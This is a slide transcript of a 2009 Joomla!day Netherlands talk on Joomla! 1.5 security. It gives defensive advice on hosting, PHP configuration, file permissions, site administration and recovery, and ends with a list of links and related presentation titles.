Joomladay Netherlands - Security

27
Joomla! 1.5 Security Joomla!day Presentation Utrecht, Netherlands 12 june 2009

Transcript of Joomladay Netherlands - Security

Page 1: Joomladay Netherlands - Security

Joomla! 1.5 Security

Joomla!day Presentation

Utrecht, Netherlands

12 june 2009

Page 2: Joomladay Netherlands - Security

Is Joomla! safe?

Page 3: Joomladay Netherlands - Security

Is the World Wide Web Safe?

Page 4: Joomladay Netherlands - Security

You know, I don't mean any disrespect, but I had to chuckle by the question "Is Joomla! not safe?" since it reminded me of the movie The Marathon Man when the dentist is pulling Dustin Hoffman's teeth out, asking "Is it safe?" and he's so desperate to get the Dentist to stop that he says Yes or No or What do you want to hear?

Is Joomla! safe?

Quote taken from:http://forum.joomla.org/viewtopic.php?f=432&t=318351&st=0&sk=t&sd=a

Page 5: Joomladay Netherlands - Security

5

Page 6: Joomladay Netherlands - Security

I would say - anyone who tells a community that a Web site or a out of the box solution

is safe is not being responsible. No, it is not "safe" on the Internet.

6

Page 7: Joomladay Netherlands - Security

What is this presentation about?

Page 8: Joomladay Netherlands - Security

Getting StartedHosting and Server SetupJoomla SetupSite AdministrationSite Recovery

Presentation overview

Page 9: Joomladay Netherlands - Security

9

Getting started

Page 10: Joomladay Netherlands - Security

10

Getting started

Page 11: Joomladay Netherlands - Security

11

Getting started

Page 12: Joomladay Netherlands - Security

Some basic things before we go into details:Report (possible) hack to JSSThttp://developer.joomla.org/security/contact-the-team.html

Please don’t report hacks or proof-of-concepts out in the open, also report them to JSSTStay informed! Automatic Email Notificationhttp://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews

RSS feedhttp://feeds.joomla.org/JoomlaSecurityNews

12

Getting started

Page 13: Joomladay Netherlands - Security

13

Hosting and server set up

Shared hosting?

Or

Dedicated hosting?

Page 14: Joomladay Netherlands - Security

14

Hosting and server set up

“register_globals”

“open_basedir”

Page 15: Joomladay Netherlands - Security

Configure Apache:Secure important areas with .htaccessUse mod_rewrite and mod_security to block PHP attacks

Configure MySQLImplement user accounts with “need-to-know” principle

Configure PHPUse PHP 5!Configure your php.ini file properly (most of the times limited with shared hosts)

15

Hosting and server set up

Page 16: Joomladay Netherlands - Security

Configure php.iniUse “disable_functions” to disable dangerous PHP functions that are not needed by your site.“Use PHP open_basedir”Don't use “PHP safe_mode” (it gives a false sense of security)Don't use “PHP register_globals”Don't use “PHP allow_url_fopen”. This option enables the URL-aware fopen wrappers that enable accessing URL object like files.

16

Page 17: Joomladay Netherlands - Security

17

Joomla! setup

Page 18: Joomladay Netherlands - Security

Some basic rules to think about:Only install official Joomla! versions!Change the default administrator usernameProtect directories and filesMove crucial files outside public directoryhttp://docs.joomla.org/Security_and_Performance_FAQs#How_do_I_move_confidential_files_outside_of_public_html.3F

Ensure that all configurable paths to writable or uploadable directories

Protect your log directory (moving it out of document root or .htaccess protect it)

Adjust file and directory permissionsSet critical directories to 755

Set file permissions to 644

Remove unneeded files18

Joomla! setup

http://docs.joomla.org/Security_and_Performance_FAQs
Page 19: Joomladay Netherlands - Security

Before you install extensionsAlways backup (even on your test system)Always test before you install on your life serverCheck for extension vulnerabilitiesDownload from trusted sitesUser beware! Check the code qualityTest! Test! Test!Remove junk files (all that is not needed)Avoid encrypted code

19

Joomla! setup

Page 20: Joomladay Netherlands - Security

20

Site administration

Page 21: Joomladay Netherlands - Security

Use well-formed passwordsMaintain a strong site backup processMonitor crack attempts (tripwire, SAMHAIN)Perform manual intrusion detection (manual logfile scan)Stay current with security patches and upgrades

21

Site administration

Page 22: Joomladay Netherlands - Security

Get help the right wayFollow a logical and rigorous recovery process Reset your administrator password (and all admins/super admins)Find exploit attempts using the *NIX shell

22

Site recovery

Page 23: Joomladay Netherlands - Security

23

Links

Page 24: Joomladay Netherlands - Security

Documentation wiki : http://docs.joomla.org/Category:Security_Checklist

Joomla! Security Strike Team (JSST): http://developer.joomla.org/security.html

Report issues to JSST : http://developer.joomla.org/security/contact-the-team.html

24

Links

http://docs.joomla.org/Category:Security_Checklist
http://developer.joomla.org/security.html
http://developer.joomla.org/security/contact-the-team.html
Page 25: Joomladay Netherlands - Security

Joomla! related

www.joomla.org

developer.joomla.org/security.html

www.secunia.org

www.milw0rm.com

Sites to put RSS feeds on

http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews

General

www.us-cert.gov

www.frsirt.com

Operating systems related

www.debian.org/security

www.openbsd.org/security

www.redhat.org/apps/support

25

Sites to monitor when you take security seriously

http://www.secunia.org/
http://www.milw0rm.com/
http://feedburner.google.com/fb/a/mailverify?uri=JoomlaSecurityNews
http://www.us-cert.gov/
http://www.frsirt.com/
http://www.debian.org/security
http://www.openbsd.org/security
http://www.redhat.org/apps/support
Page 26: Joomladay Netherlands - Security

26

Questions?

Page 27: Joomladay Netherlands - Security

SEO, Analytics and Security with sh404SEF (JoomlaDay South Africa, 2011, Cape Town)

SEO, Analytics and Security with sh404SEF (JoomlaDay South Africa, 2011, Cape Town)

Joomladay UK SEO presentation

Joomladay UK SEO presentation

SEO In Joomla - Patrick Jackson (JoomlaDay Sydney 2009)

SEO In Joomla - Patrick Jackson (JoomlaDay Sydney 2009)

Joomladay UK 2014 - You gotta know !!

Joomladay UK 2014 - You gotta know !!

Joomla wireframing Template - Joomladay Netherlands 2014 #jd14nl

Joomla wireframing Template - Joomladay Netherlands 2014 #jd14nl

Joomladay Greece 2011 - The Joomla Dilemma

Joomladay Greece 2011 - The Joomla Dilemma

Discover Synchronized Security - Sophos Day Netherlands

Discover Synchronized Security - Sophos Day Netherlands

How IT works - Joomladay UK 2014

How IT works - Joomladay UK 2014

Soy Supply Security for the Netherlands - Trinomics

Soy Supply Security for the Netherlands - Trinomics

L'accessibilité du Web Joomladay FR 2012 - Version annotée

L'accessibilité du Web Joomladay FR 2012 - Version annotée

Joomladay 2014 - Open source licenses

Joomladay 2014 - Open source licenses

Unisys Security Insights Infographic: Netherlands

Unisys Security Insights Infographic: Netherlands

Developing new feature in Joomla - Joomladay UK 2016

Developing new feature in Joomla - Joomladay UK 2016

Dutch Joomladay 2010 Keynote Hannes Papenberg

Dutch Joomladay 2010 Keynote Hannes Papenberg

Joomla on Raspberry Pi (with Nginx) - Joomladay Germany 2013

Joomla on Raspberry Pi (with Nginx) - Joomladay Germany 2013

Custom Fields in Joomla - JoomlaDay UK 2016 - Marco Dings

Custom Fields in Joomla - JoomlaDay UK 2016 - Marco Dings

Joomla 2.5 & 3.0 ACL - JoomlaDay Denmark 2012

Joomla 2.5 & 3.0 ACL - JoomlaDay Denmark 2012

JoomlaDay UK 2016 Presentation

JoomlaDay UK 2016 Presentation

Joomla REST API - JoomlaDay Bangkok 2014

Joomla REST API - JoomlaDay Bangkok 2014

Joomla 3 JLayout's - Joomladay Netherlands 2014 #jd14nl

Joomla 3 JLayout's - Joomladay Netherlands 2014 #jd14nl